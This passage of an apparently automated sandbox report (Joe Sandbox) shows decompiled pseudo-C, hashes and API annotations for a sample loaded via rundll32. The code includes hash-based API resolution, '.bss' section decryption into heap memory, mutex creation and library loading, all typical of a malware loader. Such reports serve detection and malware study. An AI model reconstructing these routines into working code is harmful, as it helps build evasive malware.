				if (E0000017B17B359EA7A0(_t176, _t225, _t230, _t289, _t286, __r9) != r13d) goto 0x359e3b6b;
				goto 0x359e3cb1;
				_t226 =  *((intOrPtr*)(_t301 + 0x20));
				r9d =  *(_t301 + 0x298);
				_t314 = _t226 + 0x17b359ef000;
				r8d =  *(_t314 + 2) & 0x0000ffff;
				if (_t226 - _t310 + 8 <= 0) goto 0x359e3baf;
				if ((r9d ^ 0xe49a1e6d) == r13d) goto 0x359e3bb2;
				E0000017B17B359E4D70(r9d ^ 0xe49a1e6d, _t310 + _t314 + 8);
				goto 0x359e3bb2;
				_t228 = _t320;
				if (_t228 != _t320) goto 0x359e3bc1;
				goto 0x359e3cb1;
				r9d = r9d ^ 0xecb028fc;
				E0000017B17B359EA8E8(r9d, _t228, _t314, __r9);
				if (_t228 == _t320) goto 0x359e3bb7;
				 *((long long*)(_t289 + 0x40)) = _t314;
				 *0x359ed440 = _t289;
				E0000017B17B359E908C(0xa30cd0f3, _t228,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t228 == _t320) goto 0x359e3bfc;
				 *_t228();
				goto 0x359e3bff;
				_t229 = _t320;
				if (_t229 ==  *((intOrPtr*)(_t301 + 0x290))) goto 0x359e3c9d;
				E0000017B17B359E908C(0x9f72cbe0, _t229,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t229 == _t320) goto 0x359e3c26;
				 *_t229();
				goto 0x359e3c29;
				E0000017B17B359E908C(0xaade337c, _t229,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t229 == _t320) goto 0x359e3c4b;
				r8d = r13d;
				 *_t229();
				goto 0x359e3c4e;
				if (_t320 != _t320) goto 0x359e3c6f;
				E0000017B17B359E908C(0xc06f8334, _t229,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t229 != _t320) goto 0x359e397d;
				goto 0x359e3cac;
				E0000017B17B359E908C(0x1c8cff93, _t229,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t229 == _t320) goto 0x359e3c8f;
				 *_t229();
				goto 0x359e3c92;
				if (r13d != r13d) goto 0x359e3cc0;
				goto 0x359e3c57;
				asm("lock add dword [esi+0x38], 0x1");
				if (E0000017B17B359E9D6C(r12d, 0x1c8cff93, _t230, _t289, _t320, _t289, __r9, _t314, _t315) == r13d) goto 0x359e3cc0;
				E0000017B17B359E6CE4(_t229, _t230, _t289, _t320, _t292);
				goto 0x359e3cc0;
				return 8;
			}






































                                0x17b359e37e0
                                0x17b359e37e0
                                0x17b359e37f1
                                0x17b359e37ff
                                0x17b359e380c
                                0x17b359e3817
                                0x17b359e3824
                                0x17b359e382b
                                0x17b359e3838
                                0x17b359e383d
                                0x17b359e3845
                                0x17b359e3850
                                0x17b359e3858
                                0x17b359e3862
                                0x17b359e3864
                                0x17b359e3866
                                0x17b359e3870
                                0x17b359e387a
                                0x17b359e3888
                                0x17b359e3892
                                0x17b359e38aa
                                0x17b359e38c2
                                0x17b359e38d5
                                0x17b359e38db
                                0x17b359e38e1
                                0x17b359e38ef
                                0x17b359e38fd
                                0x17b359e3905
                                0x17b359e390b
                                0x17b359e390d
                                0x17b359e390d
                                0x17b359e3917
                                0x17b359e391a
                                0x17b359e3921
                                0x17b359e3928
                                0x17b359e392f
                                0x17b359e3936
                                0x17b359e3944
                                0x17b359e394c
                                0x17b359e394e
                                0x17b359e3951
                                0x17b359e395a
                                0x17b359e395c
                                0x17b359e395e
                                0x17b359e3961
                                0x17b359e3968
                                0x17b359e3973
                                0x17b359e397b
                                0x17b359e397d
                                0x17b359e397f
                                0x17b359e3989
                                0x17b359e3997
                                0x17b359e39a4
                                0x17b359e39ac
                                0x17b359e39af
                                0x17b359e39af
                                0x17b359e39b6
                                0x17b359e39bc
                                0x17b359e39c8
                                0x17b359e39d0
                                0x17b359e39f5
                                0x17b359e39f9
                                0x17b359e3a00
                                0x17b359e3a0b
                                0x17b359e3a13
                                0x17b359e3a22
                                0x17b359e3a2a
                                0x17b359e3a2e
                                0x17b359e3a35
                                0x17b359e3a41
                                0x17b359e3a4a
                                0x17b359e3a52
                                0x17b359e3a54
                                0x17b359e3a66
                                0x17b359e3a6e
                                0x17b359e3a78
                                0x17b359e3a7c
                                0x17b359e3a86
                                0x17b359e3a8c
                                0x17b359e3a93
                                0x17b359e3a99
                                0x17b359e3a9f
                                0x17b359e3aa6
                                0x17b359e3aa6
                                0x17b359e3ab7
                                0x17b359e3ad6
                                0x17b359e3ae9
                                0x17b359e3aeb
                                0x17b359e3b08
                                0x17b359e3b0e
                                0x17b359e3b0e
                                0x17b359e3b1f
                                0x17b359e3b29
                                0x17b359e3b2e
                                0x17b359e3b35
                                0x17b359e3b37
                                0x17b359e3b3b
                                0x17b359e3b43
                                0x17b359e3b47
                                0x17b359e3b4b
                                0x17b359e3b4e
                                0x17b359e3b5f
                                0x17b359e3b66
                                0x17b359e3b6b
                                0x17b359e3b70
                                0x17b359e3b78
                                0x17b359e3b83
                                0x17b359e3b99
                                0x17b359e3ba3
                                0x17b359e3ba8
                                0x17b359e3bad
                                0x17b359e3baf
                                0x17b359e3bb5
                                0x17b359e3bbc
                                0x17b359e3bc1
                                0x17b359e3bce
                                0x17b359e3bd6
                                0x17b359e3bd8
                                0x17b359e3be5
                                0x17b359e3bec
                                0x17b359e3bf4
                                0x17b359e3bf8
                                0x17b359e3bfa
                                0x17b359e3bfc
                                0x17b359e3c07
                                0x17b359e3c16
                                0x17b359e3c1e
                                0x17b359e3c20
                                0x17b359e3c24
                                0x17b359e3c32
                                0x17b359e3c3a
                                0x17b359e3c3e
                                0x17b359e3c44
                                0x17b359e3c49
                                0x17b359e3c55
                                0x17b359e3c5c
                                0x17b359e3c64
                                0x17b359e3c6d
                                0x17b359e3c74
                                0x17b359e3c7c
                                0x17b359e3c8b
                                0x17b359e3c8d
                                0x17b359e3c95
                                0x17b359e3c9b
                                0x17b359e3c9d
                                0x17b359e3caf
                                0x17b359e3cb4
                                0x17b359e3cb9
                                0x17b359e3cd5

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Alloc$CloseEnumErrorFreeHandleLastModuleOpen
                                • String ID:
                                • API String ID: 2248784776-0
                                • Opcode ID: 92d77bb05cadc40fcac066ca41b522769a1026bec4031250602ee8567609c9a5
                                • Instruction ID: 172c00cea179230764568db077361a788bc4c04a9c0843af2c1fd9d10c1ca429
                                • Opcode Fuzzy Hash: 92d77bb05cadc40fcac066ca41b522769a1026bec4031250602ee8567609c9a5
                                • Instruction Fuzzy Hash: 5BD1AB3530C64096EA60AB7AE0C43EA6375FF88784F745612DE8E47792DF78E9D98300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000017B359EA0AC Relevance: 3.1, APIs: 2, Instructions: 105filenativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: File$CreateDirectoryErrorLastQuery
                                • String ID:
                                • API String ID: 2967190759-0
                                • Opcode ID: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction ID: 2b4ae433ff0857370a1cbc497c571847657174c774e06677c25a2b9a7cbc568e
                                • Opcode Fuzzy Hash: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction Fuzzy Hash: C041C13230C78096EB608B6AE9C439966B0FBDC790F684625EE9D47B95DF38D4C5C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000017B359E4DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 48%
                                			E0000017B17B359E4DB4(long long __rbx, long long __rcx, long long __rdi, long long __rsi, void* __r9, void* __r11) {
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t30;
				long long _t55;
				void* _t71;
				intOrPtr* _t74;
				intOrPtr* _t75;
				long long _t81;
				long long _t82;
				long long _t84;
				void* _t90;
				long _t92;
				long _t94;
				long _t96;

				_t90 = __r9;
				_t55 = _t84;
				 *((long long*)(_t55 + 8)) = __rbx;
				 *((long long*)(_t55 + 0x10)) = _t81;
				 *((long long*)(_t55 + 0x18)) = __rsi;
				 *((long long*)(_t55 + 0x20)) = __rdi;
				_t82 = __rcx;
				r8d = 0;
				HeapCreate(_t96, _t94, _t92); // executed
				if (_t55 == 0) goto 0x359e4f03;
				_t71 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
				_t74 = _t55 + _t71 + 0x68;
				_t22 =  *_t74;
				if (_t22 == 0) goto 0x359e4e94;
				if (_t22 == 0x7373622e) goto 0x359e4e22;
				_t75 = _t74 + 0x28;
				_t23 =  *_t75;
				if (_t23 != 0) goto 0x359e4e11;
				if (_t23 == 0) goto 0x359e4e94;
				r13d =  *(_t75 + 0x10);
				r12d =  *(_t75 + 0x14);
				r12d = r12d ^  *(_t71 + 8);
				r12d = r12d ^ r13d;
				HeapAlloc(??, ??, ??);
				if (_t55 == 0) goto 0x359e4e8d;
				r9d = r12d;
				r8d = r13d;
				E0000017B17B359E111C(_t55, _t55, __rbx, _t55, _t71 + __rcx);
				r11d =  *((intOrPtr*)(_t75 + 0xc));
				 *0x359ed448 = _t55 - __r11 - _t82;
				 *0x359ed450 = E0000017B17B359E16FC(_t55, _t55 - __r11 - _t82 + 0x359f1040);
				goto 0x359e4e99;
				goto 0x359e4e99;
				if (2 == 0) goto 0x359e4ea8;
				HeapDestroy(??);
				goto 0x359e4f03;
				HeapAlloc(??, ??, ??);
				if (0x359f1040 != 0) goto 0x359e4ee1;
				HeapDestroy(??);
				goto 0x359e4f03;
				E0000017B17B359E487A();
				 *0x17B359F1048 = _t55;
				 *0x359ed458 = 0x359f1040; // executed
				_t30 = E0000017B17B359E37E0(0x359f1040, _t82, _t90); // executed
				return _t30;
			}

















                                0x17b359e4db4
                                0x17b359e4db4
                                0x17b359e4db7
                                0x17b359e4dbb
                                0x17b359e4dbf
                                0x17b359e4dc3
                                0x17b359e4dd1
                                0x17b359e4dd4
                                0x17b359e4de3
                                0x17b359e4def
                                0x17b359e4dfb
                                0x17b359e4e02
                                0x17b359e4e07
                                0x17b359e4e0b
                                0x17b359e4e16
                                0x17b359e4e18
                                0x17b359e4e1c
                                0x17b359e4e20
                                0x17b359e4e24
                                0x17b359e4e26
                                0x17b359e4e2a
                                0x17b359e4e31
                                0x17b359e4e3a
                                0x17b359e4e3d
                                0x17b359e4e49
                                0x17b359e4e4e
                                0x17b359e4e51
                                0x17b359e4e5a
                                0x17b359e4e5f
                                0x17b359e4e75
                                0x17b359e4e85
                                0x17b359e4e8b
                                0x17b359e4e92
                                0x17b359e4e9b
                                0x17b359e4ea0
                                0x17b359e4ea6
                                0x17b359e4ec3
                                0x17b359e4ecf
                                0x17b359e4ed4
                                0x17b359e4edf
                                0x17b359e4ee9
                                0x17b359e4eee
                                0x17b359e4ef5
                                0x17b359e4efc
                                0x17b359e4f23

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$AllocDestroy$Create
                                • String ID: .bss
                                • API String ID: 388876957-3890483948
                                • Opcode ID: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction ID: e9528fe483a98cddbc02fce264c898276622b6a8621f0b7805c7c0794acd3b7d
                                • Opcode Fuzzy Hash: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction Fuzzy Hash: B8416C3570C780C6EB14CB6AA98079967B0FB89B94F248629DE4D47B94DF38E8D5C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000017B359EA7A0 Relevance: 6.1, APIs: 4, Instructions: 88memorysynchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 29%
                                			E0000017B17B359EA7A0(void* __edi, long long* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r9, long long _a8, char _a16, char _a24) {
				intOrPtr _v56;
				void* _v64;
				intOrPtr _v72;
				long long _v88;
				void* __rsi;
				void* __rbp;
				long long* _t58;
				long long* _t59;
				long long _t60;
				long long _t75;
				intOrPtr* _t87;

				_t60 = __rbx;
				_t58 = __rax;
				_a8 = __rbx;
				_t76 =  *0x359ed458;
				_t87 = __rcx;
				_v72 = 0x18;
				_v56 = 0;
				E0000017B17B359E908C(0xe9f8f8df, __rax,  *((intOrPtr*)( *0x359ed458 + 0x20)));
				if (_t58 == __rbx) goto 0x359ea804;
				r9d = 0; // executed
				 *_t58(); // executed
				goto 0x359ea806;
				if (0 == 0) goto 0x359ea8d2;
				r9d = 0;
				_a16 =  *__rcx;
				_t59 =  &_a24;
				_v88 = _t59;
				E0000017B17B359E1000(__edi, _t59, __rbx,  &_a16,  *0x359ed458, 0x17b359e0000,  *0x359ed448 + 0x17b359f1178);
				if (_t59 == _t60) goto 0x359ea8d2;
				E0000017B17B359E908C(0x3ff22481, _t59,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t59 == _t60) goto 0x359ea875;
				CreateMutexW(??, ??, ??); // executed
				goto 0x359ea878;
				_t75 = _t60;
				if (_t75 == _t60) goto 0x359ea8c4;
				E0000017B17B359E908C(0xc06f8334, _t59,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t59 == _t60) goto 0x359ea894;
				 *_t59();
				goto 0x359ea899;
				if (0x7f != 0xb7) goto 0x359ea8ba;
				E0000017B17B359E908C(0xa219a077, _t59,  *((intOrPtr*)(_t76 + 0x18)));
				if (_t59 == _t60) goto 0x359ea8c4;
				FindCloseChangeNotification(??); // executed
				goto 0x359ea8c4;
				 *((long long*)(_t87 + 0x18)) = _t75;
				HeapFree(??, ??, ??);
				return 1;
			}














                                0x17b359ea7a0
                                0x17b359ea7a0
                                0x17b359ea7a0
                                0x17b359ea7b0
                                0x17b359ea7be
                                0x17b359ea7c5
                                0x17b359ea7cf
                                0x17b359ea7dc
                                0x17b359ea7eb
                                0x17b359ea7fd
                                0x17b359ea800
                                0x17b359ea802
                                0x17b359ea808
                                0x17b359ea812
                                0x17b359ea81d
                                0x17b359ea824
                                0x17b359ea838
                                0x17b359ea83d
                                0x17b359ea848
                                0x17b359ea857
                                0x17b359ea85f
                                0x17b359ea86e
                                0x17b359ea873
                                0x17b359ea875
                                0x17b359ea87b
                                0x17b359ea886
                                0x17b359ea88e
                                0x17b359ea890
                                0x17b359ea892
                                0x17b359ea89e
                                0x17b359ea8a9
                                0x17b359ea8b1
                                0x17b359ea8b6
                                0x17b359ea8b8
                                0x17b359ea8ba
                                0x17b359ea8cc
                                0x17b359ea8e7

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: DescriptorSecurity$ChangeCloseConvertCreateErrorFindFreeHeapLastMutexNotificationString
                                • String ID:
                                • API String ID: 2727274001-0
                                • Opcode ID: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction ID: db6a3812ee0d71742a325292374be00025361a4c6a8841b1d0df723f8dd39460
                                • Opcode Fuzzy Hash: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction Fuzzy Hash: FD31B03260C68496EB70DF69E4843DA63B0FB88780F684621AE8E47795DF3CD5CAC750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000017B359E40F8 Relevance: 2.6, APIs: 2, Instructions: 131memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: AllocHeap
                                • String ID:
                                • API String ID: 4292702814-0
                                • Opcode ID: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction ID: 1ebd3b8f3cf22dfd932cf0f2752f4740dfb835aff8eaba713b289bd1cae6e8bf
                                • Opcode Fuzzy Hash: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction Fuzzy Hash: 3A515B72608B90C6D764CB19F484B9E77B4FB84B94F219215EE8D43B94DB38D8E1DB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000017B359E5FC8 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 29%
                                			E0000017B17B359E5FC8(long long* __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, void* _a24, long long _a32) {
				long long* _t32;
				long long* _t35;
				long long _t41;
				void* _t56;
				void* _t57;

				_t32 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a32 = __rsi;
				_t48 =  *0x359ed458;
				E0000017B17B359E908C(0x2d4b080e, __rax,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t32 == 0) goto 0x359e6006;
				LoadLibraryA(??); // executed
				_t35 = _t32;
				goto 0x359e6008;
				if (_t35 == 0) goto 0x359e6048;
				if (E0000017B17B359E40F8(_t35,  &_a24, _t56, _t57) != 0) goto 0x359e602e;
				_t41 = _a24;
				 *_t41 = _t35;
				 *__rdx = _t41;
				goto 0x359e6066;
				E0000017B17B359E908C(0xc8e2960c, _t32,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t32 == 0) goto 0x359e6066;
				 *_t32();
				goto 0x359e6066;
				E0000017B17B359E908C(0xc06f8334, _t32,  *((intOrPtr*)(_t48 + 0x18)));
				if (_t32 == 0) goto 0x359e6061;
				 *_t32();
				goto 0x359e6066;
				return 0x7f;
			}








                                0x17b359e5fc8
                                0x17b359e5fc8
                                0x17b359e5fcd
                                0x17b359e5fd2
                                0x17b359e5fdc
                                0x17b359e5ff2
                                0x17b359e5ffa
                                0x17b359e5fff
                                0x17b359e6001
                                0x17b359e6004
                                0x17b359e600b
                                0x17b359e601e
                                0x17b359e6020
                                0x17b359e6025
                                0x17b359e6028
                                0x17b359e602c
                                0x17b359e6037
                                0x17b359e603f
                                0x17b359e6044
                                0x17b359e6046
                                0x17b359e6051
                                0x17b359e6059
                                0x17b359e605b
                                0x17b359e605f
                                0x17b359e607c

                                APIs
                                  • Part of subcall function 0000017B359E908C: SetLastError.KERNEL32 ref: 0000017B359E90C8
                                • LoadLibraryA.KERNELBASE(?,?,00000000,0000017B359E8947,?,?,?,?,?,0000017B359E9D9C), ref: 0000017B359E5FFF
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: ErrorLastLibraryLoad
                                • String ID:
                                • API String ID: 3568775529-0
                                • Opcode ID: 99d26a6194f647cbc272d2d1eeaeaa4141e7c0158a623e847e66b8beeb9b8dfc
                                • Instruction ID: 75deb83e176acdccf7a100fe03262b5a64fc68036f4809be6bebe9c32e7a7a4b
                                • Opcode Fuzzy Hash: 99d26a6194f647cbc272d2d1eeaeaa4141e7c0158a623e847e66b8beeb9b8dfc
                                • Instruction Fuzzy Hash: 75115E3271D75086EA619B6AF5803A96270BFC8BD1F3C4531AE8E47746DF38D5C18360
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000017B359E6958 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 73%
                                			_entry_(void* __ecx, void* __edx, long long __rcx, void* __r8) {
				void* __rbx;
				void* _t2;
				long long* _t15;
				long long _t16;
				void* _t20;
				long long _t21;
				long long _t22;
				void* _t24;
				void* _t25;

				_t17 = __rcx;
				if (__edx == 0) goto 0x359e697b;
				if (__edx != 1) goto 0x359e6998;
				_t20 = __r8; // executed
				_t2 = E0000017B17B359E4DB4(_t16, __rcx, _t21, _t22, _t24, _t25); // executed
				if (_t2 == 0) goto 0x359e6998;
				goto 0x359e6998;
				E0000017B17B359E6CE4(_t15, _t16, _t17, _t20, _t22);
				if ( *0x359ed458 == 0) goto 0x359e6998;
				HeapDestroy(??); // executed
				return 0;
			}












                                0x17b359e6958
                                0x17b359e6965
                                0x17b359e6969
                                0x17b359e696b
                                0x17b359e696e
                                0x17b359e6975
                                0x17b359e6979
                                0x17b359e697d
                                0x17b359e698c
                                0x17b359e6992
                                0x17b359e699f

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Destroy$AllocCreate
                                • String ID:
                                • API String ID: 3351204586-0
                                • Opcode ID: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction ID: 4f65f41b0c4bdb08c19bd6f3f83a3b38ad15413d83984e0ace1e4d303491de1d
                                • Opcode Fuzzy Hash: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction Fuzzy Hash: 92E0E57070D24041FF645A7AE5D13E90270BF95754F785A398D4E4E385DB18E8C58390
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 0000017B359E6DF0 Relevance: 15.3, APIs: 7, Strings: 3, Instructions: 303memoryCOMMONCrypto
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 291 17b359e6df0-17b359e6e42 call 17b359e91c8 294 17b359e7239 291->294 295 17b359e6e48-17b359e6e6b 291->295 296 17b359e723e-17b359e7257 294->296 297 17b359e6e71-17b359e6e86 call 17b359e908c 295->297 298 17b359e703b 295->298 304 17b359e6e88-17b359e6e8d 297->304 305 17b359e6e8f 297->305 300 17b359e7040-17b359e7055 HeapFree 298->300 300->296 302 17b359e705b-17b359e707b call 17b359e91c8 300->302 302->294 308 17b359e7081-17b359e709e call 17b359e672c 302->308 307 17b359e6e91-17b359e6eae HeapAlloc 304->307 305->307 310 17b359e6eb4-17b359e6ecc call 17b359e47b0 307->310 311 17b359e722f-17b359e7234 307->311 317 17b359e70a8-17b359e70cb call 17b359e91c8 308->317 318 17b359e70a0-17b359e70a2 308->318 316 17b359e6ed0-17b359e6ed4 310->316 311->300 319 17b359e6ed6-17b359e6eda 316->319 320 17b359e6edc-17b359e6edf 316->320 326 17b359e7166-17b359e7189 call 17b359e91c8 317->326 327 17b359e70d1-17b359e7100 call 17b359e908c 317->327 318->294 318->317 319->320 322 17b359e6ee1-17b359e6ee5 319->322 320->316 324 17b359e6f74 322->324 325 17b359e6eeb-17b359e6efa call 17b359e908c 322->325 331 17b359e6f76 324->331 336 17b359e6f03 325->336 337 17b359e6efc-17b359e6f01 325->337 326->296 338 17b359e718f-17b359e71a5 call 17b359e672c 326->338 339 17b359e7109-17b359e711e call 17b359e47b0 327->339 340 17b359e7102 327->340 335 17b359e6f7e-17b359e6f80 331->335 341 17b359e6f86-17b359e6f9f call 17b359e908c 335->341 342 17b359e7021-17b359e7033 HeapFree 335->342 343 17b359e6f05-17b359e6f25 HeapAlloc 336->343 337->343 338->296 357 17b359e71ab-17b359e71b4 338->357 354 17b359e7134-17b359e7145 call 17b359e908c 339->354 355 17b359e7120-17b359e712f call 17b359e487a 339->355 340->339 352 17b359e6fa8-17b359e6fc5 341->352 353 17b359e6fa1 341->353 342->298 343->331 349 17b359e6f27 343->349 356 17b359e6f2a-17b359e6f32 349->356 360 17b359e6fc7 352->360 361 17b359e6fcb-17b359e6fe1 call 17b359e908c 352->361 353->352 375 17b359e7147 354->375 376 17b359e714e-17b359e715e HeapFree 354->376 355->354 363 17b359e6f46 356->363 364 17b359e6f34-17b359e6f37 356->364 357->296 358 17b359e71ba-17b359e71d5 call 17b359e908c 357->358 377 17b359e71d7 358->377 378 17b359e71de-17b359e71ef call 17b359e908c 358->378 360->361 380 17b359e6fea-17b359e6fed 361->380 381 17b359e6fe3 361->381 368 17b359e6f48-17b359e6f4b 363->368 365 17b359e6f39-17b359e6f40 364->365 366 17b359e6f42-17b359e6f44 364->366 365->364 365->366 366->363 366->368 372 17b359e6f62-17b359e6f70 368->372 373 17b359e6f4d-17b359e6f50 368->373 372->356 382 17b359e6f72 372->382 379 17b359e6f53-17b359e6f56 373->379 375->376 376->326 377->378 389 17b359e71f8-17b359e7224 call 17b359e908c 378->389 390 17b359e71f1 378->390 384 17b359e6f58-17b359e6f5b 379->384 385 17b359e6f5d-17b359e6f60 379->385 386 17b359e6fef-17b359e700a HeapFree * 2 380->386 387 17b359e7010-17b359e701f 380->387 381->380 382->335 384->372 384->385 385->379 386->387 387->300 389->296 393 17b359e7226-17b359e722d 389->393 390->389 393->296
                                C-Code - Quality: 39%
                                			E0000017B17B359E6DF0(long long __rbx, intOrPtr* __rcx, long long __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t96;
				void* _t116;
				void* _t121;
				intOrPtr _t123;
				void* _t130;
				char _t131;
				void* _t156;
				long long* _t198;
				long long* _t199;
				long long* _t201;
				char* _t218;
				char* _t219;
				long _t252;
				intOrPtr* _t253;
				long _t255;
				void* _t260;
				char* _t262;
				long long _t263;
				signed long long _t269;
				void* _t271;
				void* _t272;
				void* _t292;
				void* _t293;
				long _t300;
				long _t305;
				void* _t307;

				_t292 = _t271;
				 *((long long*)(_t292 + 8)) = __rbx;
				 *((long long*)(_t292 + 0x10)) = __rdx;
				_t272 = _t271 - 0x40;
				r14d =  *0x359ed450;
				_t253 = __rcx;
				 *((long long*)(_t272 + 0x38)) =  *((intOrPtr*)( *0x359ed458 + 8));
				if (E0000017B17B359E91C8(_t121, r14d ^ 0x55e7ce26,  *((intOrPtr*)( *0x359ed458 + 8)), __rbx, __rdx, __rdx, __rcx, _t255, _t292 - 0x58, _t292 + 0x18, _t292) != 0) goto 0x359e7239;
				_t198 =  *_t253;
				 *((long long*)(_t272 + 0x98)) = _t198;
				 *((long long*)(_t272 + 0x30)) =  *((intOrPtr*)( *0x359ed458 + 8));
				if ( *((intOrPtr*)(_t272 + 0x20)) == 0) goto 0x359e703b;
				r13d = 0xfb849f8f;
				E0000017B17B359E908C(r13d, _t198,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t198 == 0) goto 0x359e6e8f;
				 *_t198();
				goto 0x359e6e91;
				r8d = 1;
				HeapAlloc(_t307, _t305, _t300);
				 *((long long*)(_t272 + 0x28)) = _t198;
				if (_t198 == 0) goto 0x359e722f;
				0x359e47b0();
				_t262 = _t198;
				if ( *_t262 == 0x20) goto 0x359e6edc;
				if ( *_t262 != 9) goto 0x359e6ee1;
				_t263 = _t262 + 1;
				goto 0x359e6ed0;
				if ( *_t263 == 0) goto 0x359e6f74;
				E0000017B17B359E908C(r13d, _t198,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t198 == 0) goto 0x359e6f03;
				 *_t198();
				goto 0x359e6f05;
				asm("cdq");
				_t15 = _t198 + 1; // 0x1
				r8d = _t15;
				HeapAlloc(_t293, _t252, _t255);
				if (_t198 == 0) goto 0x359e6f76;
				_t130 =  *_t263;
				if (_t130 == 0) goto 0x359e6f46;
				if (_t130 == 0x20) goto 0x359e6f42;
				_t218 = _t263 + 1;
				_t131 =  *_t218;
				if (_t131 != 0) goto 0x359e6f34;
				if (_t131 != 0) goto 0x359e6f48;
				if (_t218 == 0) goto 0x359e6f62;
				 *_t218 = 0;
				_t219 = _t218 + 1;
				if ( *_t219 == 0x20) goto 0x359e6f5d;
				if ( *_t219 != 9) goto 0x359e6f62;
				goto 0x359e6f53;
				 *_t198 = _t263;
				_t199 = _t198 +  *((intOrPtr*)( *0x359ed458 + 8));
				if (_t219 + 1 != 0) goto 0x359e6f2a;
				goto 0x359e6f7e;
				if (0 == 0) goto 0x359e7021;
				E0000017B17B359E908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x359ed458 + 0x10)));
				if (_t199 == 0) goto 0x359e6fa8;
				 *_t199();
				 *((long long*)(_t253 + 0x40)) =  *((intOrPtr*)(_t272 + 0x28));
				 *((long long*)(_t253 + 0x48)) =  *((intOrPtr*)(_t272 + 0x90));
				 *((intOrPtr*)(_t253 + 0x50)) = sil;
				if ( *((char*)(_t253 + 0x70)) == 0) goto 0x359e6fcb;
				 *((char*)(_t253 + 0x70)) = 0;
				asm("lock and dword [edi+0x2c], 0xfffffffe");
